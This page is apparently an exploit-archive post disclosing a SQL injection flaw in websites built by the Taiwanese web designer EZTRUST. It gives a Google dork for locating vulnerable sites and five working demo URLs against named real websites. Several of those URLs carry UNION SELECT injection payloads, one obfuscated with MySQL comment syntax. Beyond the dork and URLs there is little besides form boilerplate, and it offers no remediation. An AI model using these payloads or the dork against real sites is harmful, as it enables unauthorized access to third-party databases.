Design By EZTRUST SQL injection Vulnerability

2016.10.21

Ashiyane Digital Security Team (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:"藝誠科技" inurl:show.php

######################
# Exploit Title : Design By EZTRUST SQL injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.eztrust.com.tw/
# Google Dork : intext:"藝誠科技" inurl:show.php
# Date: 2016 21 October
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# admin page : target/admin/
# demos :
# http://www.shichiart.com.tw/html/artist/show.php?num=12&kind=-1+union+select+version()--%20-&page=1%27
# http://www.wellnux.com/html/news/show.php?show=0&find=&find2=&chkkey01=&chkkey02=&find3=-C%27+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--%20-
# http://cabital.com.tw/html/news/show.php?show=0&class='
# http://0800072222.tw/mdbio_new/webc/html/product/02.php?kind=%5c&page=2
# http://www.pcmups.com.tw/eB/html/product/show.php?num=-15+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
######################
# discovered by : modiret
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Design By EZTRUST SQL injection Vulnerability

Dork: intext:"藝誠科技" inurl:show.php

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.